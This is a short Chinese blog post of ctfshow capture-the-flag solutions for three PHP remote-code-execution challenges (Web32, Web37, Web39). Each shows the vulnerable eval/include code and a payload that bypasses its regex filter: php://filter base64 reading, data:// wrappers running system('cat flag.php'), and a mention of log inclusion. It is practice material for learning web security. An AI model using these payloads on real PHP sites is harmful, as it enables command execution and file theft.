首页 > 其他分享 >ctfshow 1000题记录

ctfshow 1000题记录

时间:2023-03-12 12:45:07浏览次数:39  
标签:记录 text base64 ctfshow RCE php data 1000

RCE-Web32

 <?php

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}

c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php
也可以使用包含日志

RCE-Web37

 <?php
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c);
        echo $flag;
    
    }
 
}else{
    highlight_file(__FILE__);
}

data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=

RCE-Web39

 <?php
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c.".php");
    }
        
}else{
    highlight_file(__FILE__);
}

data://text/plain,<?php%20system("cat%20f*");?>//

标签:记录,text,base64,ctfshow,RCE,php,data,1000
From: https://www.cnblogs.com/V3g3t4ble/p/17207750.html

相关文章

  • 用python编写程序,使用筛选法查找并输出小于1000的所有素数
    #创建一个布尔数组,其中的值都是True,数组下标为i表示数字i是否为素数prime=[Trueforiinrange(1000)]#0和1不是素数,因此将它们的值设置为Falseprime[0]=Falseprim......
  • #yyds干货盘点 【React工作记录十六】关于三个数组的判断
     目录​​前言​​​​导语​​​​数据格式​​​​代码部分​​​​总结​​前言我是歌谣我有个兄弟巅峰的时候排名c站总榜19叫前端小歌谣曾经我花了三年的时间创作......
  • 美团3.11笔试记录
    自我感觉良好,尤其是我很菜情况下,幸运的没有碰到比较离谱的题第一题签到第二题有代价的走格子吃金币,二维dp,这题接近AC,为了赶时间没管第三题看流星,每个流行有起始时间和......
  • uniapp+django 新手学习步骤记录
    1.Django项目和uni-app项目的创建及项目文件讲解_慕容星言的博客-CSDN博客 注意同时安装了python2和python3,pip记得用pip3用pythonmanage.pystartappuniappclient创......
  • c#异步编程学习记录之一 async和await
    async放在方法名前面,表示当前方法是一个异步的方法await等待返回结果,一般这个后面会跟着一个比较耗时的操作示例如下:Console.WriteLine("Hello,World!")......
  • 日常js方法记录
    当前浏览器名称functiongetExplorer(){constua=window.navigator.userAgentconstisExplorer=(exp)=>{returnua.......
  • 练习记录-cf-div2-A-D
    上课的时候抓紧时间写的,状态不好,c也没过,估计换个环境也很难想吧ALikes题意点赞,a<0表示取消赞a>0表示增加赞,a数组乱序输出如何排让赞数价值最多分别记录大于0和小......
  • python unittest 接口自动化遇到的问题记录
    1.ConfigParser类读取config.ini的options全部返回为小写字母查看configparser.ConfigParser类中,是因为optionxform方法返回了optionstr.lower()defoptionxform(self,......
  • 0310 模拟赛记录
    0310模拟赛记录problemsetlink。\(\text{div1}100+90+20=210\)。题解1A/2B-snow\(\text{difficulty}=2.5,3\)。\(\text{tags}=线段树\)。实际上倒数没有意义......
  • BLOG begins!!!记录挂
     由于看到一篇写自己十年程序之路的编程员的文章,突然很有感触,虽然还是小菜鸟一枚,但是敲击键盘、在不同链接间旋转跳跃还是给我带来了不少乐趣!所以我突然也想开通自己的BL......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99